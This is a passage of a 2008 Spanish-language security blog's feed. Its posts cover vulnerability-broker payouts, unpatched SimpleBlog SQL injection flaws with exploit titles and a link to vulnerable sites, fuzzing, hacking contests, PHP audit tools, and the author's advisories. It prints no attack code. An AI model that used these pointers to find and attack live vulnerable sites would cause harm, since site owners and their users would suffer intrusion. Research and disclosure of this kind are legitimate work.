Vallejo.cc&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://labs.idefense.com/vcp/"&gt;iDefense Labs&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;La otra empresa que parece bastante buena y pertenece a Verisign, y que recientemente hizo algunos cambios por lo que pagará más en algunas vulnerabilidades importantes porque creo que quitaron concursos que hacían antes. Ésto me llegó al mail ya que ando registrado ahí desde hace tiempo. No tengo ninguna suma conocida, pero en la misma web que en ZDI, la de Vallejo, comenta que una vulnerabilidad con ejecución de código en algún software, de momento desconocido, le han llegado a pagar 8000$.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.wslabi.com/wabisabilabi/home.do?"&gt;Wabisabilabi&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;Desde hace pocos días, no me aparece las que se venden actualmente, no muestra ninguna, así que no se si seguirá en funcionamiento si quiera...Ya bastante info hay de este en las noticias de internet.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Os dejo una lista de lo que se ha pagado por algunas vulns:&lt;/span&gt;&lt;br /&gt;&lt;pre&gt;&lt;span style="font-style: italic;font-family:courier new;font-size:85%;"  &gt;&lt;span&gt;PostgreSQL 8.3.1 con PoC, Remota(No especifica de que tipo) --&gt; 800 Euros&lt;/span&gt;&lt;span&gt;&lt;br /&gt;Safari 3.1 con Poc, Remota(Visitando un link seguramente) --&gt; 300 Euros&lt;/span&gt;&lt;br /&gt;&lt;span&gt;IBM DB2 9.1.0 sin Poc, Remota --&gt; 1050 Euros&lt;/span&gt;&lt;br /&gt;&lt;span&gt;SAP GUI v 620 con Poc x 3 Vulnerabilidades --&gt; 5100 Euros/Vulnerabilidad&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Ahi teneis lo que se ha pagado y por cuales.&lt;br /&gt;&lt;a href="http://www.wslabi.com/wabisabilabi/initAssignedBid.do?"&gt;http://www.wslabi.com/wabisabilabi/initAssignedBid.do?&lt;/a&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Luego hay otras que ofrecen menos dinero y son menos conocidas, o directamente las ventas ilegales, que ahí si que te pueden pagar grandes cantidades. Pero merece la pena hacer eso y que te miren mal, pues no.&lt;br /&gt;&lt;br /&gt;Espero que os sirva, y el día que consiga vender una, os daré mejor mi opinión, si es que algú día lo consigo, que cada bug que consigo o ya ha sido encontrado o es flojillo y no lo compran porque no les merece la pena.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-2451460957706942071?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/2451460957706942071/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=2451460957706942071' title='8 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/2451460957706942071'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/2451460957706942071'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/09/venta-de-vulnerabilidades-en-software.html' title='Venta de Vulnerabilidades en software'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5159406234002198112</id><published>2008-09-19T13:34:00.003+02:00</published><updated>2008-09-19T14:20:15.058+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Inyección SQL'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades WEB'/><title type='text'>Pasan los años y el mismo software de siempre</title><content type='html'>Ya van pasando los años y muchas veces por vagueza o por falta de tiempo, mucho tiempo, no arreglan los fallos y siguen poniendo el software para que descarguen, y un usuario que no sabe mucho de fallos ni mira si es vulnerable o no lo que baja, porque como es lo último se imaginará que está sin ningún fallo público.&lt;br /&gt;Pero esto con &lt;a href="http://www.8pixel.net/?pageID=420"&gt;Simple Blog de 8pixel.net&lt;/a&gt; no pasa, tienen la versión 3.0 que es vulnerable a Sql Injection, y no la han arreglado me parece porque es del 2007 la vulnerabilidad y el parche de seguridad es a 2006 de la versión anterior. Además la versión 2.0 y 2.3 deben de estar en algún lado ya que cada 2 x 3 en un reto me envian páginas que encuentran vulenrables,y siguen saliendo después de dos años.&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Aquí os dejo la prueba&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Exploits públicos:&lt;/span&gt;&lt;br /&gt;2007-07-28     SimpleBlog 3.0 (comments_get.asp id) Remote SQL Injection Vulnerability&lt;br /&gt;2006-11-26     SimpleBlog &lt;= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability    &lt;br /&gt;2006-09-04     SimpleBlog &lt;= 2.3 (id) Remote SQL Injection Vulnerability&lt;br /&gt;2006-08-20     SimpleBlog &lt;= 2.0 (comments.asp) Remote SQL Injection Exploit&lt;br /&gt;2006-08-20     SimpleBlog &lt;= 2.0 (comments.asp) Remote SQL Injection Vulnerability&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Lista de páginas que han sido o son vulnerables desde( &lt;/span&gt;&lt;span style="font-weight: bold;" class="postdetails"&gt;03/12/2006 - &lt;/span&gt;&lt;span class="postdetails"&gt;&lt;span style="font-weight: bold;"&gt;19/08/2008):&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.yashira.org/index.php?showtopic=10033"&gt;http://www.yashira.org/index.php?showtopic=10033&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Fecha del primer parche de seguridad:&lt;/span&gt;&lt;br /&gt;28/11/06&lt;/span&gt; --&gt; Me imagino que para la de comments.asp y la de id&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Además muchas veces las contraseñas eran las que vienen por defecto o muy relacionadas con el nombre del sitio.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5159406234002198112?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5159406234002198112/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5159406234002198112' title='16 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5159406234002198112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5159406234002198112'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/09/pasan-los-aos-y-el-mismo-software-de.html' title='Pasan los años y el mismo software de siempre'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>16</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-3472726011413976375</id><published>2008-09-18T01:56:00.004+02:00</published><updated>2008-09-18T01:58:48.602+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fuzzing'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>De Vuelta</title><content type='html'>Después de ver las escalofriantes cifras que llegan a pagar por fallos tanto idefense como tippingpoint, me he animado a buscar fallos en software comercial conocido con la intención de encontrar algún fallo bueno y venderlo a ver que tal pagan, ya que pronto hay que sacarse el carnet de coche y no llega..ahora la cosa es buscar bien y probar y probar, una parte que puede llegar a ser muy aburrida.&lt;br /&gt;&lt;br /&gt;Asi que Fuzzing, fuzzing y más fuzzing hasta encontrar algo, de momento descubri algunos que ya fueron vendidos o posteados así que nada...xD&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-3472726011413976375?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/3472726011413976375/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=3472726011413976375' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3472726011413976375'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3472726011413976375'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/09/de-vuelta.html' title='De Vuelta'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-2310511532629253564</id><published>2008-09-10T00:17:00.002+02:00</published><updated>2008-09-10T00:19:34.895+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Diario'/><title type='text'>Vacaciones hasta el 14</title><content type='html'>Pues eso, hasta el 14 no estaré delante de un pc, más bien hasta el día 15, así que cuidense y vayan preparándose para el torneo.&lt;br /&gt;&lt;br /&gt;Si me llueve mucho a lo mejor hasta me meto algo, pero espero no meterme y tomar el sol un poco jiji&lt;br /&gt;&lt;br /&gt;Byeeee&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-2310511532629253564?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/2310511532629253564/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=2310511532629253564' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/2310511532629253564'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/2310511532629253564'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/09/vacaciones-hasta-el-14.html' title='Vacaciones hasta el 14'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-6267819630837028106</id><published>2008-09-05T02:14:00.006+02:00</published><updated>2008-09-05T02:36:06.846+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Yashira Masters'/><category scheme='http://www.blogger.com/atom/ns#' term='Retos'/><title type='text'>Yashira-Masters, Cada vez queda menos</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.yashira-masters.com"&gt;Yashira Masters&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Es el nombre del nuevo torneo que se está preparando por &lt;a href="http://www.yashira.org/"&gt;Yashira.org&lt;/a&gt; por motivo de la celebración del 5º Cumpleaños de la comunidad de Yashira, tratará de abordar varios temas relacionados con la informática como son: Hacking, Scripting y HTML, Ing. Inversa, Criptografía, Esteganografía...&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Comienzo del torneo:&lt;/span&gt;&lt;br /&gt;De momento, sólo os puedo decir que será en la 2º quincena de Septiembre, o al menos se estima que será por esas fechas. Cuando lo tenga seguro hago un post de nuevo.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Reglas:&lt;/span&gt;&lt;br /&gt;Aún por concretar aunque claro la fuerza bruta no creo que esté permitida en ninguna prueba. Eso dependerá de los retos que haya, así que tendrán que esperar.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Premios:&lt;/span&gt;&lt;br /&gt;Camisetas/remeras conmemorativas así como el título/rango especial de "Yashira Master" el cual portarán durante un año (y que posiblemente podrán conservar en una sección especial de su perfil). Se espera poder aumentar los premios, esperar a g30rg3_x a ver que hace jeje.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno a parte de todo esto, espero que participe mucha gente como pasó en &lt;a href="http://www.blindsec.com/"&gt;blindsec&lt;/a&gt; o como en los retos de &lt;a href="http://elladodelmal.blogspot.com/"&gt;Chema&lt;/a&gt;. En especial, reto a que mandingo y chema participen por hacernos sufrir en sus retos jeje, habrá que avisarles cuando eso para ver si hay suerte y tienen disponibiidad, cosa difícil.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-6267819630837028106?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/6267819630837028106/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=6267819630837028106' title='5 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6267819630837028106'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6267819630837028106'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/09/yashira-masters-cada-vez-queda-menos.html' title='Yashira-Masters, Cada vez queda menos'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5590155500591748625</id><published>2008-08-29T17:43:00.002+02:00</published><updated>2008-08-29T21:24:23.540+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades WEB'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Auditoria'/><title type='text'>PHP - Auditoría del código fuente</title><content type='html'>Acostumbrado a entrar en páginas como &lt;a href="http://www.securityfocus.org"&gt;SecurityFocus&lt;/a&gt; o &lt;a href="http://www.milw0rm.com"&gt;Milw0rm&lt;/a&gt;, ya me canso de siempre ver lo mismo, cada segundo sale una vulnerabilidad nueva que tiene que ver con CMS, o demás en lenguaje PHP. Ya sea porque trabajan muchos programadores y aunque intenten programar de forma segura se les escape algo, o porque ni se preocupen de la seguridad, siempre hay vulnerabilidades.&lt;br /&gt;&lt;br /&gt;Por lo que, para los vagos, o los pobres que no puedan contratar una empresa especializada, hay bastante buen código que te hace un análisis bastante eficaz.&lt;br /&gt;&lt;br /&gt;Os dejo dos herramientas:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://code.google.com/p/skavenger/downloads/list"&gt;Skavenger&lt;/a&gt;:&lt;br /&gt;Esta herramienta busca fallos en php, aunque modificándola puede buscar en más tipo de lenguajes mediante el uso de expresiones regulares más que nada.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://mgsdl.free.fr/?2:4"&gt;DAphpscan:&lt;/a&gt;&lt;br /&gt;Funciona mediante expresiones regulares y es bastante más completa que la anterior, busca entre otras cosas: RCE, RFI, LFI, XSS, Inyecciones SQL, CSRF, etc...Todo basandose en funciones que suelen conllevar algun peligro y que no sn filtradas adecuadamente, o no están declaradas correctamente.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Yo personalmente no las probe con código, pero con sólo ver como es el código de ambas, sobre todo de la segunda, se ve que puede detectar fácilmente fallos.&lt;br /&gt;Os dejo un sitio donde hablan de la &lt;a href="http://insanesecurity.wordpress.com/2007/10/30/source-code-audit-php/"&gt;auditoría en PHP&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5590155500591748625?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5590155500591748625/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5590155500591748625' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5590155500591748625'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5590155500591748625'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/08/php-auditora-del-cdigo-fuente.html' title='PHP - Auditoría del código fuente'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-3485017610783403824</id><published>2008-08-18T16:51:00.002+02:00</published><updated>2008-08-19T01:48:16.294+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ingenieria Inversa'/><category scheme='http://www.blogger.com/atom/ns#' term='Retos'/><title type='text'>Yashira y CracksLatinos cumplen años</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Yashira&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;Cumple 5 años en la red, el 17 de agosto del 2003, apareció yashira como una comunidad de retos de hacking, programación, ingeniería inversa y demás cosas, y aunque antes era hackyashira. com, ahora quedó como &lt;a href="http://www.yashira.org"&gt;yashira.org&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;En una comunidad que poco a poco aguanta con los años y con ayuda de los admins, y usuarios, han ido enviando retos, algunos de gran nivel donde aprender bastante.&lt;br /&gt;&lt;br /&gt;Poco a poco se ha ido haciendo una gran comunidad y de las primeras web en retos de informática en español.&lt;br /&gt;&lt;br /&gt;Además hoy mismo he tenido la suerte que me han nombrado admin del sitio, así que ahora tendré más trabajo aún ejej, cuando necesitéis algo ya sabéis, podéis consultar.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;CracksLatinos&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;Cumple 8 años en la red, el 18 de agosto del 2000, es el lugar por excelencia de ingeniería inversa en castellano y bastante importante a nivel internacional, apareció en la epoca que había muchas páginas de crackers y grupos creo. Bastante buena como ya dije en otro post.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-3485017610783403824?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/3485017610783403824/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=3485017610783403824' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3485017610783403824'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3485017610783403824'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/08/yashira-y-crackslatinos-cumplen-aos.html' title='Yashira y CracksLatinos cumplen años'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-6229321389820666311</id><published>2008-08-01T00:57:00.003+02:00</published><updated>2008-08-02T01:55:52.353+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ingenieria Inversa'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>El trabajo de Ricardo Narvaja y el grupo CrackLatinos</title><content type='html'>Esta vez voy a hablar de la &lt;span style="font-style: italic; font-weight: bold;"&gt;ingeniería inversa&lt;/span&gt;, una lista que es &lt;span style="font-style: italic; font-weight: bold;"&gt;CrackLatinos&lt;/span&gt; y un autor que es &lt;span style="font-style: italic; font-weight: bold;"&gt;Ricardo Narvaja&lt;/span&gt;, cuyo trabajo te da bastantes conocimientos sobre la ingeniería inversa, junto a todas las colaboraciones que se hacen a la lista de Cracklatinos por tantos autores que me extendería demasiado.&lt;br /&gt;&lt;br /&gt;La "&lt;a href="http://ricardonarvaja.info/WEB/INTRODUCCION%20AL%20CRACKING%20CON%20OLLYDBG%20DESDE%20CERO/"&gt;Introducción al Cracking con ollydbg desde cero"&lt;/a&gt; hecha por Ricardo Narvaja. Además de cursos actuales como el de python y otros posteriores que hará de exploiting y todos ellos de bastante buena calidad, le hacen importante en el ámbito de la ingeniería inversa.&lt;br /&gt;&lt;br /&gt;Además te contesta siempre que puede en la lista de forma rapidísima, te ayuda y colabora bastante lo que le hace un gran tío.&lt;br /&gt;&lt;br /&gt;Para aprender, &lt;span style="font-weight: bold;"&gt;organiza concursos&lt;/span&gt; de distinta temática, entre ellos:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Para quitar distintas protecciones que pueda traer un programa, unpacking...&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Sacar serials a programas hechos para la labor(crackmes)&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Exploiting, para entender como se pueden explotar los fallos en software.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Son bastante recomendables para aprender. Además en la lista, los usuarios normalmente suelen aportar con tutoriales que hacen mostrando lo que aprenden y como se hace. Un gran nivel para lo único que hace falta es tener Internet, y registrarse en la lista y cuando se pueda aportar, por supuesto.&lt;br /&gt;&lt;br /&gt;Tenéis todo el trabajo de CrackLatinos y Ricardo en su FTP, se puede entrar mediante &lt;a href="http://www.ricardonarvaja.info/"&gt;http://www.ricardonarvaja.info&lt;/a&gt;, allí se encuentran los concursos, aportaciones de la gente y obras otras cosas que podréis descubrir.&lt;br /&gt;Podrás encontrar hasta un &lt;a href="http://ricardonarvaja.info/WEB/CURSO%20NUEVO/TEORIAS%20NUMERADAS/"&gt;índice de las aportaciones&lt;/a&gt;, protecciones que trae y las técnicas antidebugging entre otras cosas.&lt;br /&gt;Así que, en definitiva, pasaros por la lista o por la web si os interesa aprender sobre ingeniería inversa.&lt;br /&gt;Aprovecho para saludar a la gente de allí: dapaf, boken, ricnar, apuromafo, solid, NCR, gera, karmany, etc, etc.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-6229321389820666311?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/6229321389820666311/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=6229321389820666311' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6229321389820666311'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6229321389820666311'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/08/el-trabajo-de-ricardo-narvaha-y-el.html' title='El trabajo de Ricardo Narvaja y el grupo CrackLatinos'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5462271229734868587</id><published>2008-07-11T03:17:00.004+02:00</published><updated>2008-07-12T17:01:05.126+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Diario'/><category scheme='http://www.blogger.com/atom/ns#' term='P1mp4m'/><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Cambios en el Blog</title><content type='html'>Hice unos pequeños cambios en el blog, y agregué varias categorías de enlaces y demás. Para empezar:&lt;br /&gt;&lt;br /&gt;-&lt;span style="font-weight: bold; font-style: italic;"&gt;Mis Artículos&lt;/span&gt;: Lugar donde incluyo todo lo que voy escribiendo para la comunidad, y algún artículo lo meteré más adelante como inacabado, ya que hay temas en los que escribo algo, pero al poco tiempo descubro algo nuevo y megusta avanzar el tutorial y el tema, y mostrar lo que aprendí. Por ejemplo el taller, poco a poco iré escribiendo un gran tutorial más completo y junto para que no se pierda y ayude a todos.&lt;br /&gt;&lt;br /&gt;A día de hoy está posteado los siguientes atículos:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.p1mp4m.es/index.php?showtopic=64"&gt;Taller sobre Stack-based Buffer Overflow - Falta ir completándolo&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://ricardonarvaja.info/WEB/CONCURSOS%202008/CONCURSO%205/Concurso%205%20-%203%20-Explotar%20VLC%20.rar"&gt;Explotando VLC &lt;=0.86.e desde Web Automaticamente&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.s21sec.com/descargas/Trancek.zip"&gt;S21sec --&gt; 2º Reto de Ing. Inversa&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://ricardonarvaja.info/WEB/CURSO%20NUEVO/TEORIAS%20NUMERADAS/1001-1100/1035-Analizando%20Malware%20Basico%20con%20Programa.rar"&gt;Análisis de Malware Básico&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.trancek.es/2008/05/viejo-artculo-sobre-cutre-ataques-en_01.html"&gt;Ataque Sencillo a Aplicación Flash&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;-&lt;span style="font-weight: bold; font-style: italic;"&gt;Mis Vulnerabilidades&lt;/span&gt;: Aquí irán los fallos que descubra, en principio para p1mp4m, pero los publicaré en securityfocus y demás.&lt;br /&gt;&lt;br /&gt;Actualmente disponibles estas:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.p1mp4m.es/index.php?showtopic=90"&gt;P1MP4M-08-007--&gt;Trillian 3.1.9.0 DTD File Buffer Overflow&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.p1mp4m.es/index.php?showtopic=89"&gt;P1MP4M-08-006--&gt;Producto...Activex Multiples Controls Buffer Overflow&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.p1mp4m.es/index.php?showtopic=88"&gt;P1MP4M-08-005--&gt;Piczo Fast Picture Uploader  Buffer Overflow&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.p1mp4m.es/index.php?showtopic=87"&gt;P1MP4M-08-004--&gt;Sony ImageStation 1.0.0.38  Buffer Overflow&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.p1mp4m.es/index.php?showtopic=86"&gt;P1MP4M-08-003--&gt;OpenSiteAdmin 0.9.1.1 Multiple File Inclusion Vulns&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.p1mp4m.es/index.php?showtopic=85"&gt;P1MP4M-08-002--&gt;All Club CMS 0.0.1f index.php Local File Inclusion&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.p1mp4m.es/index.php?showtopic=84"&gt;P1MP4M-08-001--&gt;Total Player 3.0 M3U Playlist Parsing Buffer Overflow&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;-&lt;span style="font-weight: bold; font-style: italic;"&gt;Mis exploits&lt;/span&gt;: Enlaces a los exploits que he hecho, aunque tengo alguno como el VLC, preferí meterlo como artículo.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.p1mp4m.es/index.php?showtopic=58"&gt;CoolPlayer 2.17 .m3u File Local Buffer Overflow&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Y ahí agregaré estas pequeñas cosas con tiempo ya que irán creciendo, lo demás apartados como el de datos personales, donar, links interesantes y lo de votar, ya estaban en línea.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5462271229734868587?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5462271229734868587/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5462271229734868587' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5462271229734868587'/><link rel='self' 